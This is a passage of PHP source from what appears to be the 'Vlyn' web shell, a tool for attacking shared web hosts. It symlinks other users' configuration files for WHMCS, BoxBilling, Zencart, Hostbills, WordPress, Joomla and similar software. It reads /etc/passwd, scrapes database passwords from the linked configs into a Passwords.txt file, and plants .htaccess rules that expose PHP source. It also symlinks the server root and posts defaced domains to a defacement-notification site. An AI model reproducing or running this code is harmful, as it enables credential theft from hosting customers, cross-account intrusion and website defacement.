  2155. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2156. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2157. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2158. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2159. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2160. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2161. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2162. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2163. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2164. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2165. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2166. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2167. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2168. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2169. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2170. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2171. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2172. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2173. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2174. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2175. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2176. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2177. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2178. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2179. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2180. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2181. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2182. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2183. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2184. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2185. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2186. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2187. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2188. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2189. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2190. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2191. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2192. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2193. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2194. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2195. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2196. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2197. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2198. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2199. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2200. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2201. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2202. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2203. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2204. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2205. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2206. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2207. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2208. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2209. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2210. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2211. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2212. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2213. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2214. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2215. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2216. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2217. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2218. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2219. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2220. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2221. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2222. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2223. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2224. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2225. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2226. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2227. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2228. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2229. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2230. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2231. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2232. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2233. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2234. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2235. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2236. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2237. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2238. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2239. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2240. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2241. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2242. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2243. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2244. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2245. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2246. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2247. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2248. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2249. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2250. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2251. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2252. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2253. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2254. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2255. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2256. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2257. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2258. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2259. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2260. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2261. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2262. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2263. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2264. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2265. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2266. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2267. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2268. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2269.  
  2270. }
  2271.  
  2272. //password grab
  2273.  
  2274. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2275. {
  2276.  
  2277. $ar0=explode($marqueurDebutLien, $text);
  2278. $ar1=explode($marqueurFinLien, $ar0[1]);
  2279. $ar=trim($ar1[0]);
  2280. return $ar;
  2281. }
  2282.  
  2283. $ffile=fopen('Passwords.txt','a+');
  2284.  
  2285.  
  2286. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/Vlyn_symconf/";
  2287. $re=$r;
  2288. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2289.  
  2290. $users=file("/etc/passwd");
  2291. foreach($users as $user)
  2292. {
  2293.  
  2294. $str=explode(":",$user);
  2295. $usersss=$str[0];
  2296. foreach($confi as $co)
  2297. {
  2298.  
  2299.  
  2300. $uurl=$re.$usersss.$co;
  2301. $uel=$uurl;
  2302.  
  2303. $ch = curl_init();
  2304.  
  2305. curl_setopt($ch, CURLOPT_URL, $uel);
  2306. curl_setopt($ch, CURLOPT_HEADER, 1);
  2307. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2308. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2309. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2310. $result['EXE'] = curl_exec($ch);
  2311. curl_close($ch);
  2312. $uxl=$result['EXE'];
  2313.  
  2314.  
  2315. if($uxl && preg_match('/table_prefix/i',$uxl))
  2316. {
  2317.  
  2318. //Wordpress
  2319.  
  2320. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2321. if(!empty($dbp))
  2322. $pass=$dbp."\n";
  2323. fwrite($ffile,$pass);
  2324.  
  2325. }
  2326. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2327. {
  2328.  
  2329. //WHMCS
  2330.  
  2331. $dbp=entre2v2($uxl,"db_password = '","';");
  2332. if(!empty($dbp))
  2333. $pass=$dbp."\n";
  2334. fwrite($ffile,$pass);
  2335.  
  2336. }
  2337.  
  2338.  
  2339. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2340. {
  2341.  
  2342. //Joomla
  2343.  
  2344. $db=entre2v2($uxl,"password = '","';");
  2345. if(!empty($db))
  2346. $pass=$db."\n";
  2347. fwrite($ffile,$pass);
  2348. }
  2349. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2350. {
  2351.  
  2352. //Vbulletin
  2353.  
  2354. $db=entre2v2($uxl,"password'] = '","';");
  2355. if(!empty($db))
  2356. $pass=$db."\n";
  2357. fwrite($ffile,$pass);
  2358.  
  2359. }
  2360. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2361. {
  2362.  
  2363. //Other
  2364.  
  2365. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2366. if(!empty($db))
  2367. $pass=$db."\n";
  2368. fwrite($ffile,$pass);
  2369. }
  2370. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2371. {
  2372.  
  2373. //Other
  2374.  
  2375. $db=entre2v2($uxl,"dbpass = '","';");
  2376. if(!empty($db))
  2377. $pass=$db."\n";
  2378. fwrite($ffile,$pass);
  2379. }
  2380. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2381. {
  2382.  
  2383. //Other
  2384.  
  2385. $db=entre2v2($uxl,"dbpass = '","';");
  2386. if(!empty($db))
  2387. $pass=$db."\n";
  2388. fwrite($ffile,$pass);
  2389.  
  2390. }
  2391. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2392. {
  2393.  
  2394. //Other
  2395.  
  2396. $db=entre2v2($uxl,"dbpass = \"","\";");
  2397. if(!empty($db))
  2398. $pass=$db."\n";
  2399. fwrite($ffile,$pass);
  2400. }
  2401.  
  2402.  
  2403. }
  2404. }
  2405. echo "<center>
  2406. <a href=\"Vlyn_symconf/root/\">Root Server</a>
  2407. <br><a href=\"Vlyn_symconf/Passwords.txt\">Passwords</a>
  2408. <br><a href=\"Vlyn_symconf/\">Configurations</a></center>";
  2409. }
  2410. else
  2411. {
  2412. echo "<center>
  2413. <form method=\"POST\">
  2414. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2415. $file = '/etc/passwd';
  2416. $read = @fopen($file, 'r');
  2417. if ($read){
  2418. $body = @fread($read, @filesize($file));
  2419. echo "".htmlentities($body)."";
  2420. }
  2421. elseif(!$read)
  2422. {
  2423. $read = @show_source($file) ;
  2424. }
  2425. elseif(!$read)
  2426. {
  2427. $read = @highlight_file($file);
  2428. }
  2429. elseif(!$read)
  2430. {
  2431. for($uid=0;$uid<1000;$uid++)
  2432. {
  2433. $ara = posix_getpwuid($uid);
  2434. if (!empty($ara))
  2435. {
  2436. while (list ($key, $val) = each($ara))
  2437. {
  2438. print "$val:";
  2439. }
  2440. print "\n";
  2441. }}}
  2442.  
  2443. flush();
  2444.  
  2445. echo "</textarea>
  2446. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2447. </form></center>";
  2448. }
  2449. }
  2450. }
  2451. elseif($_GET['do'] == 'symlink') {
  2452. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2453. $d0mains = @file("/etc/named.conf");
  2454. ##httaces
  2455. if($d0mains){
  2456. @mkdir("Vlyn_sym",0777);
  2457. @chdir("Vlyn_sym");
  2458. @exe("ln -s / root");
  2459. $file3 = 'Options Indexes FollowSymLinks
  2460. DirectoryIndex janVlyn.htm
  2461. AddType text/plain .php
  2462. AddHandler text/plain .php
  2463. Satisfy Any';
  2464. $fp3 = fopen('.htaccess','w');
  2465. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2466. echo "
  2467. <table align=center border=1 style='width:60%;border-color:#00ffec;'>
  2468. <tr>
  2469. <td align=center><font size=3><font color=lime>No.</font></td>
  2470. <td align=center><font size=3><font color=lime>Domains</font></td>
  2471. <td align=center><font size=3><font color=lime>Users</font></td>
  2472. <td align=center><font size=3><font color=lime>Symlink</font></td>
  2473. </tr>";
  2474. $dcount = 1;
  2475. foreach($d0mains as $d0main){
  2476. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2477. flush();
  2478. if(strlen(trim($domains[1][0])) > 2){
  2479. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2480. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  2481. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  2482. <td>".$user['name']."</td>
  2483. <td><a href='$full/Vlyn_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  2484. flush();
  2485. $dcount++;}}}
  2486. echo "</table>";
  2487. }else{
  2488. $TEST=@file('/etc/passwd');
  2489. if ($TEST){
  2490. @mkdir("Vlyn_sym",0777);
  2491. @chdir("Vlyn_sym");
  2492. exe("ln -s / root");
  2493. $file3 = 'Options Indexes FollowSymLinks
  2494. DirectoryIndex janVlyn.htm
  2495. AddType text/plain .php
  2496. AddHandler text/plain .php
  2497. Satisfy Any';
  2498. $fp3 = fopen('.htaccess','w');
  2499. $fw3 = fwrite($fp3,$file3);
  2500. @fclose($fp3);
  2501. echo "
  2502. <table align=center border=1><tr>
  2503. <td align=center><font size=3><font color=lime>No.</font></td>
  2504. <td align=center><font size=3><font color=lime>Users</font></td>
  2505. <td align=center><font size=3><font color=lime>Symlink</font></td></tr>";
  2506. $dcount = 1;
  2507. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  2508. while(!feof($file)){
  2509. $s = fgets($file);
  2510. $matches = array();
  2511. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2512. $matches = str_replace("home/","",$matches[1]);
  2513. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2514. continue;
  2515. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2516. <td align=center><font class=txt>" . $matches . "</td>";
  2517. echo "<td align=center><font class=txt><a href=$full/Vlyn_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2518. $dcount++;}fclose($file);
  2519. echo "</table>";}else{if($os != "Windows"){@mkdir("Vlyn_sym",0777);@chdir("Vlyn_sym");@exe("ln -s / root");$file3 = '
  2520. Options Indexes FollowSymLinks
  2521. DirectoryIndex janVlyn.htm
  2522. AddType text/plain .php
  2523. AddHandler text/plain .php
  2524. Satisfy Any
  2525. ';
  2526. $fp3 = fopen('.htaccess','w');
  2527. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2528. echo "
  2529. <div class='mybox'><h2 class='k2ll33d2'><font color=lime>Server Symlinker</h2>
  2530. <table align=center border=1><tr>
  2531. <td align=center><font size=3><font color=lime>ID</font></td>
  2532. <td align=center><font size=3><font color=lime>Users</font></td>
  2533. <td align=center><font size=3><font color=lime>Symlink</font></td></tr>";
  2534. $temp = "";$val1 = 0;$val2 = 1000;
  2535. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  2536. if ($uid)$temp .= join(':',$uid)."\n";}
  2537. echo '<br/>';$temp = trim($temp);$file5 =
  2538. fopen("test.txt","w");
  2539. fputs($file5,$temp);
  2540. fclose($file5);$dcount = 1;$file =
  2541. fopen("test.txt", "r") or exit("Unable to open file!");
  2542. while(!feof($file)){$s = fgets($file);$matches = array();
  2543. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  2544. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2545. continue;
  2546. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2547. <td align=center><font class=txt>" . $matches . "</td>";
  2548. echo "<td align=center><font class=txt><a href=$full/Vlyn_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2549. $dcount++;}
  2550. fclose($file);
  2551. echo "</table></div></center>";unlink("test.txt");
  2552. } else
  2553. echo "<center><font size=3><font color=red>Cannot Create Symlink</font></center>";
  2554. }
  2555. }
  2556. }
  2557. elseif($_GET['do'] == 'defacerid') {
  2558. echo "<center><form method='post'>
  2559. <u>Defacer</u>: <br>
  2560. <input type='text' name='hekel' size='50' value='Vlyn'><br>
  2561. <u>Team</u>: <br>
  2562. <input type='text' name='tim' size='50' value='Scary Crazy Forbidden'><br>
  2563. <u>Domains</u>: <br>
  2564. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2565. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2566. </form>";
  2567. $site = explode("\r\n", $_POST['sites']);
  2568. $go = $_POST['go'];
  2569. $hekel = $_POST['hekel'];
  2570. $tim = $_POST['tim'];
  2571. if($go) {
  2572. foreach($site as $sites) {
  2573. $zh = $sites;
  2574. $form_url = "https://www.defacer.id/notify";
  2575. $data_to_post = array();
  2576. $data_to_post['attacker'] = "$hekel";
  2577. $data_to_post['team'] = "$tim";
  2578. $data_to_post['poc'] = 'SQL Injection';
  2579. $data_to_post['url'] = "$zh";
  2580. $curl = curl_init();
  2581. curl_setopt($curl,CURLOPT_URL, $form_url);
  2582. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2583. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2584. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2585. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2586. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2587. $result = curl_exec($curl);
  2588. echo $result;
  2589. curl_close($curl);
  2590. echo "<br>";
  2591. }
  2592. }
  2593. }
  2594.  
  2595. elseif($_GET['do'] == 'config') {
  2596. if($_POST){
  2597. $passwd = $_POST['passwd'];
  2598. mkdir("Vlyn_config", 0777);
  2599. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  2600. $htc = fopen("Vlyn_config/.htaccess","w");
  2601. fwrite($htc, $isi_htc);
  2602. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  2603. foreach($user_config[1] as $user_Vlyn) {
  2604. $user_config_dir = "/home/$user_Vlyn/public_html/";
  2605. if(is_readable($user_config_dir)) {
  2606. $grab_config = array(
  2607. "/home/$user_Vlyn/.my.cnf" => "cpanel",
  2608. "/home/$user_Vlyn/.accesshash" => "WHM-accesshash",
  2609. "/home/$user_Vlyn/public_html/bw-configs/config.ini" => "BosWeb",
  2610. "/home/$user_Vlyn/public_html/config/koneksi.php" => "Lokomedia",
  2611. "/home/$user_Vlyn/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2612. "/home/$user_Vlyn/public_html/clientarea/configuration.php" => "WHMCS",
  2613. "/home/$user_Vlyn/public_html/whmcs/configuration.php" => "WHMCS",
  2614. "/home/$user_Vlyn/public_html/forum/config.php" => "phpBB",
  2615. "/home/$user_Vlyn/public_html/sites/default/settings.php" => "Drupal",
  2616. "/home/$user_Vlyn/public_html/config/settings.inc.php" => "PrestaShop",
  2617. "/home/$user_Vlyn/public_html/app/etc/local.xml" => "Magento",
  2618. "/home/$user_Vlyn/public_html/admin/config.php" => "OpenCart",
  2619. "/home/$user_Vlyn/public_html/slconfig.php" => "Sitelok",
  2620. "/home/$user_Vlyn/public_html/application/config/database.php" => "Ellislab",
  2621. "/home/$user_Vlyn/public_html/whm/configuration.php" => "WHMCS",
  2622. "/home/$user_Vlyn/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2623. "/home/$user_Vlyn/public_html/central/configuration.php" => "WHM Central",
  2624. "/home/$user_Vlyn/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2625. "/home/$user_Vlyn/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2626. "/home/$user_Vlyn/public_html/submitticket.php" => "WHMCS",
  2627. "/home/$user_Vlyn/public_html/configuration.php" => "Joomla",
  2628. "/home/$user_Vlyn/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2629. "/home/$user_Vlyn/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2630. "/home/$user_Vlyn/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2631. "/home/$user_Vlyn/public_html/Home/configuration.php" => "JoomlaHome",
  2632. "/home/$user_Vlyn/public_html/HOME/configuration.php" => "JoomlaHome",
  2633. "/home/$user_Vlyn/public_html/home/configuration.php" => "JoomlaHome",
  2634. "/home/$user_Vlyn/public_html/NEW/configuration.php" => "JoomlaNew",
  2635. "/home/$user_Vlyn/public_html/New/configuration.php" => "JoomlaNew",
  2636. "/home/$user_Vlyn/public_html/new/configuration.php" => "JoomlaNew",
  2637. "/home/$user_Vlyn/public_html/News/configuration.php" => "JoomlaNews",
  2638. "/home/$user_Vlyn/public_html/NEWS/configuration.php" => "JoomlaNews",
  2639. "/home/$user_Vlyn/public_html/news/configuration.php" => "JoomlaNews",
  2640. "/home/$user_Vlyn/public_html/Cms/configuration.php" => "JoomlaCms",
  2641. "/home/$user_Vlyn/public_html/CMS/configuration.php" => "JoomlaCms",
  2642. "/home/$user_Vlyn/public_html/cms/configuration.php" => "JoomlaCms",
  2643. "/home/$user_Vlyn/public_html/Main/configuration.php" => "JoomlaMain",
  2644. "/home/$user_Vlyn/public_html/MAIN/configuration.php" => "JoomlaMain",
  2645. "/home/$user_Vlyn/public_html/main/configuration.php" => "JoomlaMain",
  2646. "/home/$user_Vlyn/public_html/Blog/configuration.php" => "JoomlaBlog",
  2647. "/home/$user_Vlyn/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2648. "/home/$user_Vlyn/public_html/blog/configuration.php" => "JoomlaBlog",
  2649. "/home/$user_Vlyn/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2650. "/home/$user_Vlyn/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2651. "/home/$user_Vlyn/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2652. "/home/$user_Vlyn/public_html/beta/configuration.php" => "JoomlaBeta",
  2653. "/home/$user_Vlyn/public_html/Beta/configuration.php" => "JoomlaBeta",
  2654. "/home/$user_Vlyn/public_html/BETA/configuration.php" => "JoomlaBeta",
  2655. "/home/$user_Vlyn/public_html/PRESS/configuration.php" => "JoomlaPress",
  2656. "/home/$user_Vlyn/public_html/Press/configuration.php" => "JoomlaPress",
  2657. "/home/$user_Vlyn/public_html/press/configuration.php" => "JoomlaPress",
  2658. "/home/$user_Vlyn/public_html/Wp/configuration.php" => "JoomlaWp",
  2659. "/home/$user_Vlyn/public_html/wp/configuration.php" => "JoomlaWp",
  2660. "/home/$user_Vlyn/public_html/WP/configuration.php" => "JoomlaWP",
  2661. "/home/$user_Vlyn/public_html/portal/configuration.php" => "JoomlaPortal",
  2662. "/home/$user_Vlyn/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2663. "/home/$user_Vlyn/public_html/Portal/configuration.php" => "JoomlaPortal",
  2664. "/home/$user_Vlyn/public_html/wp-config.php" => "WordPress",
  2665. "/home/$user_Vlyn/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2666. "/home/$user_Vlyn/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2667. "/home/$user_Vlyn/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2668. "/home/$user_Vlyn/public_html/Home/wp-config.php" => "WordPressHome",
  2669. "/home/$user_Vlyn/public_html/HOME/wp-config.php" => "WordPressHome",
